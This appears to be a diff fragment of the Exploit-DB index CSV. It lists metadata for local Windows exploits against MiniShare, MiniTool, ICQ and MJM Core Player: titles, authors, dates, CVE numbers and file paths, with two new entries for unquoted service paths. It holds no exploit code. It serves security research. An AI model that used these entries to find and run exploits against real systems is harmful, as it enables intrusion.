 15575,exploits/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)",2010-11-19,0v3r,local,windows,,2010-11-20,2016-09-16,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15575.png,http://www.exploit-db.comminishare-1.5.5.zip,
 15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,,2010-11-03,2018-12-19,1,,,,,http://www.exploit-db.comminishare-1.5.5.zip,
 50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",2022-04-11,"Saud Alenazi",local,windows,,2022-04-11,2022-04-11,0,,,,,,
+51578,exploits/windows/local/51578.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36164,,,,,
+51579,exploits/windows/local/51579.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36165,,,,,
 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,,2021-01-04,2021-01-04,0,,,,,,
 19993,exploits/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",local,windows,,2000-06-06,2012-07-21,1,CVE-2000-0552;OSVDB-1376,,,,,https://www.securityfocus.com/bid/1307/info
 17230,exploits/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,local,windows,,2011-04-30,2011-04-30,1,OSVDB-72101,"Metasploit Framework (MSF)",,,,http://www.corelan.be/advisories.php?id=CORELAN-11-004